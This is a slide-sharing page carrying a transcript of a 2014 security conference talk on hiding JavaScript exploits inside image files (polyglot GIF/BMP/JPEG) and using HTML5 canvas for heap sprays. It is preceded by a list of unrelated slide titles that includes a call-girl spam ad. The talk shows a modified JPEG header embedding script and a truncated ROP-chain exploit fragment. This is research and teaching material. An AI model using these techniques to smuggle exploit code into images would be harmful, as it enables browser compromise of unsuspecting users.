The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
buds n tech IT solutions
buds n tech IT solutionsbuds n tech IT solutions
buds n tech IT solutions
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software Solutions
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 

Hacking with Pictures: Exploiting Browsers with Steganography and Polyglot Files

  • 1. Hacking with Pictures net-square Saumil Shah Hack.LU 2014
  • 2. Saumil Shah CEO, Net-Square net-square Introduction @therealsaumil saumilshah hacker, trainer, speaker, author - educating, entertaining and exasperating audiences since 1999
  • 3. net-square #who am i CEO Net-Square Reverse Engineering Exploit Writing Penetration Testing Offensive Security Attack Defense Conference Speaker Conference Trainer Web 2.0 HTML5 XSS CSRF SQLi CORS XST clickjacking AJAX FLASH RIA SOAP Web Services UXSS XPATHi .... ... <insert buzzwordy appsec jargon here>
  • 4. net-square Avoiding Radar JS Obfuscation Broken File Formats OLE Embedding Javascript/ Actionscript Spreading the payload
  • 5. net-square Hiding In Plain Sight
  • 6. G r e e t i n g s P r o f e s s o r F a l k e n net-square
  • 7. net-square I'm an evil Javascript I'm an innocent image
  • 8. net-square function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(une scape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax _esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744; addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ec x_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be 0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_ eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000 ;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_ 24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addr essof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""! <CANVAS>
  • 9. net-square Avoid the EVIL eval() var a = eval(str); a = (new Function(str))(); Hat tip: Dr. Mario Heiderich @0x6D6172696F
  • 10. Theory Becomes Practice - 2014 net-square Hiding In Plain Sight
  • 11. IMAJS net-square I IZ JAVASCRIPT!
  • 12. Cross Container Scripting - XCS net-square <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script>
  • 13. net-square IMAJS – The Concept • "Polyglot files" – term coined by Ange Albertini @corkami • IMAJS is targeted towards browsers. • It is a perfectly valid image... • ...and a perfectly valid Javascript!
  • 14. IMAJS-GIF Browser Support Height Width Browser/Viewer Image net-square Renders? Javascript Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes -
  • 15. IMAJS-BMP Browser Support Height Width Browser/Viewer Image net-square Renders? Javascript Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes -
  • 16. net-square All new IMAJS-JPG! • JPG is more powerful than other formats for hiding stuff. • Thanks to EXIF data! • JPG+JS • JPG+HTML • ...and JPG+JS+HTML! Hat tip: Michael Zalewski @lcamtuf
  • 17. Start marker length Start marker length net-square The Secret Sauce Regular JPEG Header FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 FF E2 ... "J F I F 0" next section... Modified JPEG Header FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... next section... "J F I F 0" whole lot of extra space!
  • 18. FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker comment! net-square The Secret Sauce Modified JPEG Header See the difference? FF D8 FF E0 /* 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ... Javascript goes here next section... Start marker length next section... "J F I F 0" whole lot of extra space!
  • 20. CANVASHTML5 for Exploit Dev • jscript9.dll introduced many changes. – No %u0000 in strings. – No 0x00000000 in strings. • Kills conventional Heap Sprays. • <CANVAS> to the rescue! • IE9 and above "support" HTML5. • <!DOCTYPE html> net-square
  • 21. net-square CANVAS for Exploit Dev • Heap Sprays through Pixel Arrays! • No character restrictions. – All pixels treated equally! • And a bonus... ALPHA CHANNELS.
  • 23. MS14-035 CInput Use-After-Free IMAJS stego PWN! net-square
  • 24. < PAYLOADS GO net-square back in time
  • 25. I'M IN UR BASE GET /lolcat.png 200 OK net-square Attack Timeline JS Exploit code encoded in PNG. EVIL ....KILLING UR DOODZ GET /decoder.jpg 200 OK GET /lolcat.png 304 Not Modified Decoder script references PNG from cache. SAFE MAY 2014 OCT 2014
  • 26. net-square Conclusions - Offensive • Lot of possibilities! • Weird containers, weird encoding, weird obfuscation. • Image attacks emerging "in the wild". • Not limited to just browsers.
  • 27. net-square Conclusions - Defensive • DFIR nightmare. – how far back does your window of inspection go? • Can't rely on extensions, file headers, MIME types or magic numbers. • Wake up call to browser-wallahs.
  • 28. net-square Greets and props • Michael Zalewski @lcamtuf • Ange Albertini @corkami • @zer0mem • Mario Heiderich @0x6D6172696F • The fantastic crew of HACK.LU!
  • 29. net-square Saumil Shah saumil@net-square.com @therealsaumil saumilshah